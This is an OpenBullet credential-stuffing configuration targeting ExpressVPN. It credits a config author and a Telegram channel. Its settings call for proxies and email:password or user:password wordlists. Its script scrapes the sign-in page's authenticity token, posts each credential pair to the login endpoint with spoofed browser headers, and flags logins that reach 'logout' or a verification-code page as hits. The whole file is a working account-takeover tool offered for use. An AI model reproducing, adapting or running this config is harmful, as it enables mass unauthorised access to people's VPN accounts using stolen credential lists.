[SETTINGS]
{
  "Name": "ExpressVpn",
  "SuggestedBots": 50,
  "MaxCPM": 0,
  "LastModified": "2020-09-10T16:01:32.746133+04:30",
  "AdditionalInfo": "[Telegram Channel:T.me/OpenBulletChannel]-[CAPTURE]",
  "Author": "Config By: @AGC007",
  "Version": "1.4.4 [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "UserPass",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "Crop": false,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#CONECT_WEB REQUEST GET "https://www.expressvpn.com/sign-in" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#TOKEN PARSE "<SOURCE>" LR "name=\"authenticity_token\" value=\"" "\" />" -> VAR "TOKEN" 

#LOGIN REQUEST POST "https://www.expressvpn.com/sessions" 
  CONTENT "utf8=%E2%9C%93&authenticity_token=<TOKEN>&location_fragment=&redirect_path=&email=<USER>&password=<PASS>&commit=Sign+In" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Edg/85.0.4183.83" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: fa,en-US;q=0.9,en;q=0.8" 
  HEADER "cache-control: max-age=0" 
  HEADER "content-length: 232" 
  HEADER "origin: https://www.expressvpn.com" 
  HEADER "referer: https://www.expressvpn.com/sign-in" 
  HEADER "sec-fetch-dest: document" 
  HEADER "sec-fetch-mode: navigate" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "sec-fetch-user: ?1" 
  HEADER "upgrade-insecure-requests: 1" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Invalid email or password" 
  KEYCHAIN Success OR 
    KEY "logout" 
    KEY "Verification code" 

